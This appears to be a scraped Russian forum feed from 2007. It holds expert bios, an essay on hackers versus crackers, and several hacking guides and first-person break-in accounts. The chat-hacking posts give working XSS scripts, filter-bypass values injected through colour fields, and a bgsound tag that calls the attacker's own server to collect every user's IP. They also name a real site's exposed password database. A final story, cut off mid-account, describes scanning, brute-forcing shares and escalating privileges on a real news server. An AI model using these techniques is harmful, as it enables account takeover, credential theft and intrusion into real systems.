Firewall Toolkit. Контролировал и защищал сети, построенные на основе UNIX в течение 13 лет, включая настройку и управление доменом whitehouse.gov. Ранум – частый лектор и участник конференций по информационной безопасности.</p> <p>Ли Саттерфилд (Lee Sutterfield) – один из основателей и исполнительный вице-президент компании WheelGroup. Получил признание в Центре информационной войны Военно-воздушных сил США. Имеет 15-тилетний опыт работы в области защиты информации.</p> <p>Юджин Спаффорд (Eugene Spafford) – профессор, директор лаборатории COAST в университете Purdue. В университете занимался вопросами увеличения надежности компьютерных систем, что привело к занятию вопросами защиты информации. Автор большого числа публикаций в области обеспечения информационной безопасности. В течение последних лет служил консультантом многих государственных и коммерческих организаций, включая ФБР, АНБ, Министерство Энергетики, Военно-воздушные силы США и т.д. Является одним из авторов системы анализа защищенности на уровне операционной системы COPS, системы обнаружения атак Tripwire, IDIOT и многих других.</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 22:03:56 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=35#p35 https://viktoro2007.apbb.ru/viewtopic.php?pid=34#p34 <p>Просматривая большое количество статей (главным образом, в электронных журналах) о проблемах компьютерного взлома, нельзя не обратить внимание на тот факт, что ни в одной из них не проводится та грань, которая, как нам кажется, четко разделяет всех, так или иначе связанных с компьютерной безопасностью. В основном мнение компьютерного мира по этому поводу либо сугубо негативное (хакеры - это преступники), либо скромно-позитивное (хакеры - &quot;санитары леса&quot;). На самом деле у этой проблемы существует по меньшей мере две стороны, положительная и отрицательная, и между ними проходит четкая граница. Эта граница разделяет всех профессионалов, связанных с информационной безопасностью, на хакеров (hackers) и кракеров (crackers). И те, и другие во многом занимаются решением одних и тех же задач - поиском уязвимостей в вычислительных системах и осуществлением на них атак (&quot;взломом&quot;). </p> <p>Принципиальное различие между хакерами и кракерами состоит в целях, которые они преследуют. Основная задача хакера в том, чтобы, исследуя вычислительную систему, обнаружить слабые места (уязвимости) в ее системе безопасности и информировать пользователей и разработчиков системы с целью последующего устранения найденных уязвимостей. Другая задача хакера - проанализировав существующую безопасность вычислительной системы, сформулировать необходимые требования и условия повышения уровня ее защищенности. </p> <p>С другой стороны, основная задача кракера состоит в непосредственном осуществлении взлома системы с целью получения несанкционированного доступа к чужой информации - иначе говоря, для ее кражи, подмены или для объявления факта взлома. Кракер, по своей сути, ничем не отличается от обычного вора, взламывающего чужие квартиры и крадущего вещи. Он взламывает вычислительные системы и крадет чужую информацию. Итак, кардинальное различие между хакерами и кракерами в том, что первые - исследователи компьютерной безопасности, а вторые - просто воры или вандалы. Хакер в данной терминологии - это специалист. В качестве доказательства приведем определение из словаря Guy L. Steele: HACKER, сущ. 1. Индивидуум, который получает удовольствие от изучения деталей функционирования компьютерных систем и от расширения их возможностей, в отличие от большинства пользователей компьютеров, которые предпочитают знать только необходимый минимум. 2. Энтузиаст программирования; индивидуум, получающий удовольствие от самого процесса программирования, а не от теоретизирования по этому поводу. Данная трактовка термина &quot;хакер&quot; отличается от принятой в средствах массовой информации, которые, собственно, и привели к подмене понятий. В последнее время многие специалисты по компьютерной безопасности (особенно на Западе) стали аккуратнее относиться к этим терминам и мы в подобной трактовке этих терминов уже не одиноки. </p> <p>Низменность мотивов кракеров и отсутствие стремления к профессиональному росту приводят к тому, что 90% из них являются &quot;чайниками&quot; , которые взламывают плохо администрируемые системы, в основном используя чужие программы (обычно такая программа называется exploit). Причем это мнение тех самых 10% профессиональных кракеров - бывших хакеров, ставших на путь нарушения закона. Их, в отличие от кракеров-&quot;чайников&quot; , остановить действительно очень сложно, но, как показывает практика, отнюдь не невозможно. Очевидно, что для предотвращения возможного взлома или устранения его последствий требуется пригласить квалифицированного специалиста по информационной безопасности - профессионального хакера. </p> <p>Однако было бы несправедливо смешать в одну кучу всех кракеров, однозначно назвав их ворами. По нашему мнению, кракеров можно разделить на три следующих класса в зависимости от цели, с которой осуществляется взлом: вандалы, &lt; шутники&gt; и профессиональные взломщики. </p> <p>Вандалы - самая известная (во многом благодаря широкому распространению вирусов, а также творениям некоторых журналистов) и, надо сказать, самая малочисленная (к счастью) часть кракеров. Их основная цель - взломать систему для ее дальнейшего разрушения. К ним можно отнести, во-первых, любителей команд типа rm -f -d *, del *.*, format c:/U и т. д., и, во-вторых, специалистов в написании вирусов или &quot;троянских коней&quot;. Совершенно естественно, что весь компьютерный мир ненавидит кракеров-вандалов лютой ненавистью. Эта стадия кракерства характерна для новичков и быстро проходит, если кракер продолжает совершенствоваться (ведь довольно скучно осознавать свое превосходство над беззащитными пользователями). Кракеров, которые даже с течением времени не миновали эту стадию, а только все более оттачивали свои навыки разрушения, иначе, чем социальными психопатами, не назовешь. </p> <p>&quot;Шутники&quot; - наиболее безобидная часть кракеров (конечно, в зависимости от того, насколько злые они предпочитают шутки), основная цель которых - известность, достигаемая путем взлома компьютерных систем и внесения туда различных эффектов, выражающих их неудовлетворенное чувство юмора. К &quot;шутникам&quot; также можно отнести создателей вирусов с различными визуально-звуковыми эффектами (музыка, дрожание или переворачивание экрана, рисование всевозможных картинок и т. п.). &quot;Шутники&quot; обычно не наносят существенного ущерба компьютерным системам и их администраторам (разве что моральный). На сегодняшний день в Internet это наиболее распространенный класс кракеров, обычно осуществляющих взлом Web-серверов, чтобы оставить там упоминание о себе. Все это либо невинные шалости начинающих, либо рекламные акции профессионалов. </p> <p>Взломщики - профессиональные кракеры, пользующиеся наибольшим почетом и уважением в кракерской среде. Их основная задача - взлом компьютерной системы с серьезными целями, например с целью кражи или подмены хранящейся там информации. Как правило, для того чтобы осуществить взлом, необходимо пройти три основные стадии: исследование вычислительной системы с выявлением в ней изъянов (уязвимостей), разработка программной реализации атаки и непосредственное ее осуществление. Естественно, настоящим профессионалом можно считать только того кракера, который для достижения своей цели проходит все три стадии. С некоторой натяжкой профессионалом можно также считать того кракера, который, используя добытую третьим лицом информацию об уязвимости в системе, пишет ее программную реализацию (exploit). Осуществить третью стадию, используя чужие разработки, очевидно, может практически каждый. </p> <p>Если абстрагироваться от предмета кражи, то работа взломщиков - это обычное воровство. К сожалению, у нас, в России, все не так просто. Конечно, взлом компьютерных систем ни в коем случае нельзя назвать достойным делом, но в стране, где большая часть находящегося у пользователей программного обеспечения является пиратским (хотя здесь ситуация, наконец, меняется в лучшую сторону - становится модным использовать легальное ПО), то есть украденным не без помощи тех же взломщиков, почти никто не имеет морального права &quot;бросить в них камень&quot;. </p> <p>В этой книге мы ограничимся рассмотрением хакеров-кракеров с позиций распределенных систем, однако не нужно забывать, что самая многочисленная категория кракеров занимается более обыденными вещами, а именно: снятием защиты с коммерческих версий программных продуктов, изготовлением регистрационных ключей (registration key) для условно-бесплатных программ (shareware) и т. п. </p> <p>Сетевая информационная безопасность: мифы и реальность<br />Всемогущество хакеров<br />Глубокое непонимание большинством обывателей проблем, связанных с информационной безопасностью в вычислительных системах, с течением времени сформировало определенный миф о всемогуществе хакеров и повсеместной беззащитности компьютерных систем. Действительно, современные вычислительные системы и сети общего назначения имеют серьезнейшие проблемы с безопасностью. Но, подчеркнем, именно вычислительные системы общего назначения. Там же, где требуется обработка критической информации и обеспечение высшего уровня защиты и секретности (например, в военной области, в атомной энергетике и т. п.), используются специализированные защищенные ВС, которые (и это чрезвычайно важно!) в основном изолированы от сетей общего назначения (от сети Internet, например). Поэтому необходимо развеять первый миф, исключительно популярный в художественной литературе, кино, а также в средствах массовой информации: кракер не может проникнуть извне в вычислительную систему стратегического назначения (например, в ВС атомной станции или пункта управления стратегическими вооружениями). <br />Новую жизнь в этом миф вдохнул последний военный конфликт в Югославии. Согласно сообщениям российских СМИ складывалось ощущение, что военные сети НАТО полностью беззащитны, и полный контроль над ними имеют &quot;отважные хакеры&quot;. Естественно, что когда такие перлы попадали в электронные эхо-конференции, то только в разделы юмора. </p> <p>Тем не менее, мы говорим лишь о невозможности получения несанкционированного удаленного доступа именно извне. В том случае, если нанести ущерб системе вознамерится кракер из состава персонала защищенной ВС, то сложно абстрактно судить о том, насколько успешны будут его попытки. </p> <p>В качестве примера напомним случай на Игналинской АЭС, когда местный системный программист внедрил в ВС программную закладку (&quot;троянского коня&quot;), которая чуть не привела к аварии станции. Однако, как утверждает статистика, нарушения безопасности системы собственным персоналом составляют около 90% от общего числа нарушений. Итак, критические вычислительные системы нельзя назвать неуязвимыми, но реализовать на них успешную удаленную атаку практически невозможно. </p> <p>Прочитав этот пункт, недоверчивый читатель может заметить, что он лично встречал заметки о том, как &quot;кракеры проникли в компьютер Пентагона или НАСА&quot; . Все дело в том, что любая уважающая себя организация, будь то ЦРУ, АНБ или НАСА, имеет свои WWW- или ftp-сервера, находящиеся в открытой сети и доступные всем. И кракеры в этом случае проникали именно в них (а ни в коем случае не в секретные или закрытые сети), используя, может быть, один из механизмов, описанных в этой книге. </p> <p>Защита банковских систем<br />Другим и, пожалуй, наиболее устойчивым мифом является миф о всеобщей беззащитности банковских вычислительных систем. Да, действительно, в отличие от ВС стратегического назначения, банки из-за конкурентной борьбы между собой вынуждены для обеспечения удобства и быстродействия работы с клиентами предоставлять им возможность удаленного доступа из сетей общего пользования к своим банковским вычислительным системам. Однако, во-первых, для связи в этом случае используются защищенные криптопротоколы и разнообразные системы сетевой защиты (например, Firewall), и, во-вторых, предоставление клиенту возможности удаленного доступа отнюдь не означает, что клиент может получить доступ непосредственно к внутренней банковской сети. По мнению специалистов, зарубежные банковские ВС (про отечественные мы не говорим, пока еще не достигнут соответствующий уровень автоматизации расчетов) являются наиболее защищенными после ВС стратегического назначения. <br />Однако в последние годы некоторым журналистам, в том числе и отечественным, в погоне за сенсацией удалось (и не без успеха, особенно на основе реально имевшего место дела Левина) придумать миф о всеобщей беззащитности банковских систем. Яркий пример подобных творений - статья г-на А. Какоткина &quot;Компьютерные взломщики&quot; , опубликованная в еженедельнике &quot;Аргументы и Факты&quot; в феврале 1997 года. Вывод из этой статьи, перефразируя слова ее автора, можно сделать следующий: &quot;Каждому хакеру - по бронежилету и запасному процессору&quot;. Не нужно быть крупным специалистом по компьютерной безопасности, чтобы, прочитав эту статью, понять, что она неправдоподобна от начала и до конца (особенно смешно читать &quot;подробности&quot; взлома банковской сети). Возможно, впрочем, что недостаточно просвещенного в этой области журналиста некие люди ввели в заблуждение (или, что неудивительно, он просто чего-то не понял). </p> <p>Более интересным, на наш взгляд, вопросом является то, насколько надежно на самом деле защищены банковские сети, особенно в том случае, если к ним предусмотрен удаленный доступ из сети Internet. К сожалению, мы не можем дать точного ответа, пока специализированные системы безопасности банковских ВС (естественно, под такими системами не имеются в виду операционные системы типа Novell NetWare, Windows NT или 95, UNIX, которые хоть и часто применяются в банковской среде, но специализированными уж никак не являются) не будут сертифицированы. Единственное, что можно гарантировать, - то, что с вероятностью около 99,9% подобные системы будут подвергаться угрозе отказа в обслуживании, которая рассмотрена далее. </p> <p>Сетевые кракеры<br />Недоверие к описанным в средствах массовой информации способам того, как кракеры осуществляют взлом, и того, к каким результатам это приводит, побудило нас подробнее рассмотреть вопрос: а реальны ли вообще такие взломы? <br />Так вот, ни одного подтвержденного факта осуществления целенаправленного взлома с помощью программных средств (а не с помощью подкупа и т. п.) нам не удалось найти ни в России, ни за рубежом. </p> <p>Да, почти каждый день вскрываются WWW-сервера каких-то компаний. Но здесь жертва выбирается не целенаправленно, а большей частью случайно: &quot;повезет - не повезет&quot;. Более того, подмена некоторых WWW-страниц часто вовсе не означает, как будет показано в следующих главах, полного контроля над атакованным хостом, злоумышленник может вообще не иметь к нему никакого доступа, а просто подменять эти страницы с помощью перемаршрутизации. Собственно, взлом WWW-серверов и составляет 90% всех проявлений якобы всемогущих кракеров, обсуждаемых в сетевой и несетевой прессе. </p> <p>Легендарный Кевин Митник был большей частью именно легендарным. Его самая известная (и возможно, единственная реальная) атака обсуждается в четвертой главе книги &quot;Атака на Internet&quot;. Даже если принять эту атаку так, как она преподносится, очевиден тот факт, что она была придумана не им и осуществлена в то время, когда в Internet гораздо меньше беспокоились о безопасности. </p> <p>Можно вспомнить еще дело Левина. Очень туманное дело. Если Левин (или кто-то еще) действительно вскрыл CitiBank, пользуясь только своей головой и руками, то мы готовы взять свои слова обратно. Но на сегодняшний день наиболее убедительной является версия, что у него все же были сообщники в этом банке, которые предоставили ему входное имя и пароль. Косвенным подтверждением этого служит факт, что &quot;гениальный взломщик банков&quot; почему-то был гениален только в самом процессе взлома и вел себя, скажем, не очень умно при сокрытии своих следов и противоборстве с правоохранительными органами. </p> <p>Все это позволяет нам предположить, что проблема сетевых кракеров в том виде, как она обычно преподносится СМИ, на самом деле отсутствует. Да, много сил должно уделяться защите компьютерных систем от &quot;псевдохакеров&quot;, которые считают себя профессионалами, умея запускать различные &quot;нюки&quot; (nuke) или подбирать пароли типа &quot;guest&quot;. Они способны нанести этим определенный урон. Существуют, безусловно, и более квалифицированные группы кракеров, занимающиеся, например, взломом WWW-серверов для &quot;увековечивания&quot; собственного имени. Но у нас вызывает большое сомнение существование профессионалов, а тем более налаженной индустрии, которая допускает взлом любого более-менее защищенного хоста &quot;на заказ&quot;. По собственному опыту мы можем предположить, что цена такого взлома должна быть в несколько раз больше, чем ценность находящейся там информации, поэтому в ход идут старые проверенные методы типа вербовки или подкупа. </p> <p>Резюмируя, мы считаем, что никаких сетевых кракеров, специализирующихся на вскрытии хостов за деньги или с целью использования полученной информации для собственного обогащения, не существует. Их квалификация должна быть настолько высока, что во всем мире таких людей можно без труда пересчитать, и они наверняка являются хакерами, а не кракерами.</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 22:01:19 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=34#p34 https://viktoro2007.apbb.ru/viewtopic.php?pid=33#p33 <p>1. ЧАСТЬ ПЕРВАЯ, или показываем свое.<br />Основу интерфейса практически любого чата соствляют динамически генерируемые HTML-формы, связанные между собой посредством javascript. В практически всех чатах имя пользователя и пароль (или некий идентификатор, который генерируется при входе пользователя) хранятся внутри формы в качестве скрытого (hidden) элемента и могут извлекаются оттуда посредством скрипта. Заставив кого-либо из посетителей чата выполнить свой javascript, Вы можете, по сути, получить полный контроль над ним - сказать фразу от его имени или выдать его пароль. </p> <p>Для человека, знающего хотя бы основы HTML и Javascript, не составит труда разобраться в структуре интерфейса чата, но вот подсунуть в эту структуру &quot;троянский&quot; скрипт - это проблема. </p> <p>В простейшем случае, когда набираемый вами текст показывается в окне чата &quot;как есть&quot; - без какого-либо контроля - вы просто вводите текст вашего скрипта. Если возникает проблема с ограничением на длину строки - разбейте скрипт на несколько коротких функций. </p> <p>Но в большинстве чатов все же имеется проверка, которая не дает ввод большинства &quot;опасных&quot; тегов, в т.ч. и &lt;script&gt;, либо запрещены теги вообще. Но тем не менее во многих случаях удается ее обойти. Ведь помимо тэга &lt;SCRIPT&gt; есть еще и казалось бы безобидные теги &lt;A&gt;, &lt;IMG&gt; &lt;FORM&gt; и другие, которые позволяют задать URL как javascript: или задать отклики объекта на события: OnClick, OnMouseOver и т.д. </p> <p>Кроме того, теги могут проверяться в основном окне чата, но не контролироваться при вводе информации о пользователе. И можно вставить скрипт, например, в информацию о себе. Тогда тот участник чата, который имел неосторожность посмотреть вашу информацию получит вместо нее ваш скрипт. Например, следующий скрипт помещенный в личную информацию успешно работал на чате Copris (сейчас чат, похоже, накрылся, так что я смело его помещаю): </p> <p> &lt;script&gt;<br /> for( I=1 ; I&lt;=11 ; I++ ){<br />&#160; if( I==1 ) alert( &quot;Че те надо?????&quot; );<br />&#160; else alert( &quot;Я тя &quot; + ( (I==11)? &quot;последни&quot; : I ) + &quot;й раз спрашиваю - че те надо???&quot; );<br /> }<br /> alert(&quot;а здесь все равно нету нифика...&quot;);<br /> top.frames['Inform'].document.forms[0].Accent.options[31].selected = 1;<br /> top.frames['Inform'].document.forms[0].Announce.value&#160; &#160;=&#160; &quot;Я&#160; люблю тебя, 3APA3A!&quot;;<br /> top.frames['Inform'].document.forms[0].submit();<br /> top.frames['Dark'].document.forms[2].submit();<br /> &lt;/script&gt;</p> <p>Этот безобидный скрипт дает alertы посетителю, после чего помещает признание любви к 3APA3е от имени посетителя в общее окно чата. Это стимулирует остальных посетителей на просмотр личной информации о 3APA3е. Тем не менее, скрипт можно было сделать и менее дружественным - например, посылать в приват пароль посетителя, который хранится в виде в виде скрытого элемента формы в каждом фрейме. Более того, можно было бы даже написать что-то типа вируса, который, например, меняет имя пользователя на &quot;3APA3A&quot; и ставит ему соответствующий пароль. Таким образом можно &quot;заразить&quot; всех участников чата. Изменение скрипта таким образом, чтобы высылать в приват пароль посетителя и превращать его в 3APA3у (при этом все его сообщения будут исходить от 3APA3ы, но видеть сообщения для нее он не будет), требовало ровно пять дополнительных строчек на javascript (три на первое действие и два на второе). </p> <p>Похожая дыра присутствует в очень многих чатах, где посетителю позволяют выбрать цвет или размер текста. Как правило, вводимые им значения цвета не проверяются. Напрямую, или путем модификации странички, сохранив ее на диске (в том случае, если цвет предлагают не ввести и выбрать из набора), можно, например, в качестве цвета вместо любимого значения 'black' задать '&gt;&lt;script' (если таг печатается в чате как &lt;FONT COLOR=black&gt; Если печатаются кавычки (COLOR=&quot;black&quot;), то задача несильно усложняется - надо всего лишь их нейтрализовать, например '&quot;&gt;&lt;script p=&quot;'. </p> <p>Как правило, тип шрифта указывается непосредственно перед фразой введенной посетителем. Так что в своей фразе вы теперь смело можете писать любой скрипт! Так мы имеем возможность закинуть Javascript в общее окно чата, что открывает обширные возможности... Но, нужно отметить, что засунуть закрывающий таг тоже может быть достаточно сложно, а без этого скрипт работать не будет. Впрочем, иногда скрипт просто удается засунуть в COLOR целиком. </p> <p>2. ЧАСТЬ ВТОРАЯ, или смотрим чужое.<br />И, наконец, существует несколько способов простого хищения паролей из чатов. Если чат расположен на сервере apache, и проверяет имена пользователей по файлу htpasswd (при этом ваш браузер выкидывает окошко с предложением ввести имя и пароль для доступа к ресурсу), то всегда есть вероятность, что нерадивые администраторы положили его в доступный каталог. Можно для этого воспользоваться URL типа <a href="http://www.somechat.com/chat/.htpasswd." rel="nofollow" target="_blank">http://www.somechat.com/chat/.htpasswd.</a> Точное расположение файла можно узнать стянув файл .htaccess из данной директории. Это, обычно не удается. Но часто удается стянуть его копию, которая осталась с последнего редактирования файла, например <a href="http://www.somechat.com/chat/.htaccess~" rel="nofollow" target="_blank">http://www.somechat.com/chat/.htaccess~</a> или <a href="http://www.somechat.com/chat/.htaccess.old" rel="nofollow" target="_blank">http://www.somechat.com/chat/.htaccess.old</a> (в том случае, если копии этих файлов любезно оставлены администратором). </p> <p>Если чат расположен на Микрософтовском сервере и использует ODBC для доступа к базе данных паролей, то можно попытаться стянуть файл с базой, например если она имеет формат Microsoft Access и хранится в том же каталоге, то достаточно просто угадать ее имя, чтобы получить полную информацию обо всех пользователях вместе с паролями :) Классический пример - чат &quot;Пластилин&quot; (я уже послал уведомление администраторам чата): <a href="http://www.plastilin.nnov.ru/talkzone/talkzone.mdb" rel="nofollow" target="_blank">http://www.plastilin.nnov.ru/talkzone/talkzone.mdb</a> </p> <p>Следует сразу заметить, что почти все сказанное выше справедливо не только для HTML-чатов, но и для других WEB-сервисов, таких как доски объявлений (WWW-boards) или гостевые книжки (Guestbooks).</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 22:00:35 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=33#p33 https://viktoro2007.apbb.ru/viewtopic.php?pid=32#p32 <p>Я предполагаю, что читатель знает, что такое CGI, и на этом построю своё объяснение. </p> <p>Начал я с малого. </p> <p>В любом чате фрейм, в котором ты пишешь сообщения, генерится динамически (для каждого входящего) и, возможно, содержит несколько скрытых полей. Типа &lt;input type=hidden name=cookie value=SP202134&gt; (так в партизанах хранится UserID) </p> <p>Идея в следующем: сохраняем содержимое этого фрейма на диске и исправляем его так, что бы можно было с ним работать со своего винта. Т.е. заменяем ссылки типа /cgi-bin/refresh.pl на полный путь wwwchat.nsk.su/cgi-bin/refresh.pl и вместо скрытых полей формы пишем типа &lt;input type=text name=cookie value=SP202134&gt; (что бы можно было их изменять) После этого делаем HTML документ для &quot;сборки чата&quot; из кусков. Т.е. примерно так </p> <p>&#160; &#160;&quot;First.htm&quot;<br />&lt;html&gt;<br />&lt;frameset rows=&quot;80%,20%&quot;&gt;<br />&#160; &#160;&lt;frameset cols=&quot;70%,30%&quot;&gt;<br />&#160; &#160; &lt;frame name=&quot;razg&quot; src=&quot;http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+nocookie#end&quot;&gt;<br />&#160; &#160; &lt;frame name=&quot;rigt&quot; src=&quot;http://www.chat.nsk.su/right.html&quot;&gt;<br />&#160; &#160;&lt;/frameset&gt;<br />&#160; &#160;<br />&#160; &#160;&lt;frame name=&quot;bot&quot; src=&quot;start.htm&quot;&gt;<br />&lt;/frameset&gt;<br />&lt;/html&gt;</p> <p>Start.htm - это и есть тот фрейм который я сохранил и изменил </p> <p>После этого я просто броузером открывал эту страницу (First.htm). И сразу(!!!) попадал в чат, минуя стандартную процедуру входа. Это позволило : <br />1. Обходить зарегистрированные имена <br />2. Прятать свой IP от киллеров, за счет взятия чужого ID'a </p> <p>Дальше мне стало интересно вычислить IP участников. Я обнаружил, что не запрещён тэг &lt;bgsound src=&quot;&quot;&gt;. Это позволило вставлять в своё сообщение ресурс со своей машины. Сам по себе звук на хер не нужен, но этот косяк позволил вставить в свой месс строку типа &lt;bgsound src=&quot;http://MyIP/cgi-bin/spy.exe&quot;&gt;. Этот скрипт (spy.exe) вызывался с машины КАЖДОГО участника чата. Это позволило увидеть IP всех (скрипт просто сохранял мне на винт данные из переменной окружения REMOTE_ADDR). Это мне не очень понравилось, тк не понятно было где чей IP. Примерно в это-же время в чате появились приваты. Это значит, что документ в главном фрейме (тот где мессы все) стал называться по другому. </p> <p>До приватов : <br /><a href="http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor#end" rel="nofollow" target="_blank">http://www.chat.nsk.su/cgi-bin/refresh. &#8230; zgovor#end</a> </p> <p>После появления приватов : <br /><a href="http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+SP345678#end" rel="nofollow" target="_blank">http://www.chat.nsk.su/cgi-bin/refresh. &#8230; 345678#end</a> </p> <p>Где SP456789 - UserID </p> <p>После этого в скрипт (spy.exe) был добавлен вывод ID'a из переменной окружения HTTP_REFERER Ну а сопоставить ник с ID'ом не проблемма, тк ID каждого прописан там же примерно в такой строке </p> <p>&#160; &#160;&lt;br&gt;&lt;b&gt;&lt;font color=yellow size=-1&gt;Тут ник&lt;/font&gt;&lt;/b&gt;<br />&#160; &#160;&lt;font color=black&gt;&lt;a href=&quot;/cgi-bin/private_form.cgi?SP448188&quot;&gt;<br />&#160; &#160;&lt;img src=/img/mes.gif border=0 vspace=0&gt;&lt;/a&gt;&lt;/font&gt;</p> <p>(Это строка взята из правого фрейма, где можно вызвать функцию &quot;Кто в чате&quot;) </p> <p>После этого перестало быть проблемой сопоставление ника и IP. Затем я решил позабавиться с приватами. </p> <p>Используя метод сохранения странички на винт (описанный выше), я получил форму для отправления приватов от КОГО-ТО КОМУ-ТО. Т.е. я смог в отсылаемом приватно сообщении проставлять имя отправителя. </p> <p>Осталось только одно. Я знал, что в чате есть киллеры, но ничего не знал про то, что это, где это, как это. Знал только, что для того, чтобы киллерствовать надо зайти на какую-то страничку. Очевидно, что в этой киллерской страничке показываются имена. Я предположил, что моё имя показываются таким, каким я его ввожу. Исходя из этого, я под именем &lt;bgsound src=&quot;http://MyIP/cgi-bin/spy.exe&quot;&gt; MyNick зашел в чат (через прокси), и начал легонько ругаться (мне надо было, чтобы киллеры зашли на свою страничку). После этого (когда меня убили) я разгреб лог моего ВебСервера (OmniHTTPd beta) и увидел там обращение со страници не относящейся к известным мне страницам чата. Я полез на эту страницу и получил запрос на ввод пароля, со словами &quot;Дорогой администратор...&quot;. Это приятно согрело душу. Дальше я начал думать, то ли подобрать пароль, то ли ещё что придумать. Но ситуация так сложилась, что я оказался в одной сети с киллером, и, запустив сниффер, я поимел пароль. </p> <p>Ну вот и все. </p> <p>With best regards, Maveric. </p> <p>P.S. Ни один из этих приколов уже не работает в партизанах, т.к. это был &quot;дружественный взлом&quot; и обо всем, что я нашел, я рассказал создателю чата. Он все косяки исправил.</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 21:59:57 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=32#p32 https://viktoro2007.apbb.ru/viewtopic.php?pid=31#p31 <p>Тема такова : Как мы взломали новостной сайт штата Айдахо. </p> <p>Предыстория такова: </p> <p>Однажды, когда пора была студеной, решил я что-нибудь сломать,&#160; и стал лазить в поисках какого нибудь более менее приличного сервака на базе НТ (т.к я занимаюсь только НТ), но чтобы он в то же время не был сильно защищенным. </p> <p>А история. ........ : </p> <p>Ночь первая: </p> <p>И в этих своих поисках наткнулся на очень добротно сделанный и относительно публичный сайт,&#160; на котором выставлялись новости штата Айдахо (этот сайт вы можете посмотреть и сейчас&#160; &#160;- <a href="http://www.idahonews.com" rel="nofollow" target="_blank">http://www.idahonews.com</a>). </p> <p>И взбрело мне (по закрепившейся привычке) поглядеть степень защищенности и (самое главное) степень тупости админа. Для этого я стал юзать (что думаете???) свой любимый Нетскап 3.01.&#160; Стал лазить по директориям и обнаружил Очень странную для сегодняшнего дня вещь,&#160; а именно директории /scripts и /cgi-bin оказались открытыми&#160; (как известно наверное многим, в НТ можно запускать любые файлы из этих директорий, т.е получается, что ты из бровсера своего можешь запустить прогу на удаленной машине, лишь поместив ее в одну из этих директорий).&#160; Подумав о тупости админа, я пришел к выводу,&#160; что на данный момент моего исследования системы&#160; эта его характеристика поднимается до уровня &quot;средний&quot;. :) </p> <p>Сделав такой вывод, я решил продолжить свои изыскания. Для начала я решил просканить сервак на предмет открытых портов, а следовательно и сервисов, на нем установленных. Для этого я использовал очень полезную тулзену,&#160; которая зовется Ogre (спасибо Rhino9 ).&#160; Эта штука выдала мне следующую картину : </p> <p>Scanning - 198.60.102.4<br />======================<br />Commencing Port Scan:<br />Port 21: Open --- это ФТП открыт <br />Port 23: Closed<br />Port 25: Open <br />Port 53: Open<br />Port 79: Closed<br />Port 80: Open<br />Port 110: Open<br />Port 111: Closed<br />Port 139: Open ---Возможно есть File Sharing<br />Port 443: Closed<br />Port 1080: Closed<br />Port 8181: Closed<br />Surveying Web Server:<br />--Checking for Vulnerable URLs:<br />Frontpage Extensions: Not Present<br />IIS HTML Administration Interface: Present ---- Управление серваком через IIS<br />IIS Samples: Present<br />Commencing Nbtstat Scan:<br />NetBIOS Remote Machine Name Table<br />Name Type Status<br />---------------------------------------------<br />Registered Registered Registered Registered Registered Registered<br />Registered Registered Registered Registered Registered <br />MAC Address = 00-60-08-B0-7B-9E<br />PRNET &lt;00&gt; UNIQUE ----- ИМЯ МАШИНЫ <br />PRNET &lt;20&gt; UNIQUE <br />IDAHONEWS &lt;00&gt; GROUP <br />IDAHONEWS &lt;1C&gt; GROUP <br />IDAHONEWS &lt;1B&gt; UNIQUE <br />IDAHONEWS &lt;1E&gt; GROUP <br />PRNET &lt;03&gt; UNIQUE <br />IDAHONEWS &lt;1D&gt; UNIQUE <br />INet~Services &lt;1C&gt; GROUP <br />..__MSBROWSE__.&lt;01&gt; GROUP <br />IS~PRNET.......&lt;00&gt; UNIQUE <br />Из этой информации я понял, что сервак доступен из под прошаренных ресурсов и фтп (первое обычно полезнее, но медленнее). </p> <p>Затем я попробовал зайти на сервак под аккаунтами, которые станадртно присутствуют в НТ (Guest,&#160; Administrator),&#160; у меня ничего не вышло, тогда я решил попытать такие штуки как аккаунты IIS (Internet Information Service), обычно они выглядят так IUSR_&lt;имя машины с шарами&gt;. Ogre мне показал, что имя машины PRNET,&#160; значит юзернейм будет IUSR_PRNET.&#160; С этим вариантом тоже ничего не получилось.&#160; Что ж, придется прибегать к насилию ! </p> <p>Для осуществления насильственных действий я выбрал програмку NAT (Net Auditing Tool), которая пробует подключиться к шарам с юзернеймами и паролями из словаря и потом проверяет возможности этого пароля на сервере! </p> <p>Обычно в словаре стандартные пароли и имена, я его немножко поправил, добавив пароли и имена IUSR_PRNET, PRNET, IDAHO,&#160; NEWS, IDAHONEWS и т.д. (уже не помню какие еще).&#160; И оставил свой комп проверять эти варианты,&#160; а сам пошел на кухню перекусить. </p> <p>Когда я вернулся, то обнаружил,&#160; что NAT подобрал пароль и проверил дырки в шарах. </p> <p>Имя и пароль, которые он нашел (TEST TEST -кста ОООчень глупо), имел доступ почти ко всем прошаренным каталогам ! Но самое главное - он имел доступ к каталогу InetPub/scripts. </p> <p>Еще оказалось, что под ним можно войти и в WINNT (совсем тупо ), там я попытался спереть SAM._ из каталога /REPAIR,&#160; но безуспешно (хоть к нему доступ закрыт был), тогда я понял, что так легко сервак не дастся.&#160; (Конечно, можно считать что он дался,&#160; т.к. уже тогда я мог подменить страничку и т.д.,&#160; но я имею в виду под &quot;дался&quot; Administrator доступ). Я подправил логи и отрубился. </p> <p>Ночь вторая: </p> <p>Я связался с парнем,&#160; с которым мы этим делом занимаемся обычно (он просил его ник не называть), и веселье началось! Для начала мы решили попробовать такую штуку как Getadmin.exe, чтобы получить права админа, а там уж и пароли дернуть. </p> <p>Запихнули ее в /scripts и бровзером запустили для юзернейма TEST.&#160; Выглядело это так (для незнающих естественно): <a href="http://www.idahonews/scripts/getadmin.exe?test." rel="nofollow" target="_blank">http://www.idahonews/scripts/getadmin.exe?test.</a> </p> <p>Нам вернулось сообщение типа &quot;Cgi error (так и должно быть) User test get Administrator's rights&quot;, или что то в этом роде. Мы обрадовались и решили, что дело сделано, но не тут-то было: сервер сразу повис,&#160; &#160;перезагрузился и восстановил параметры юзеров (хитрец).&#160; Мы проделали это еще раз,&#160; &#160;но не добились результата.&#160; (Естественно, поднимание сервера происходило 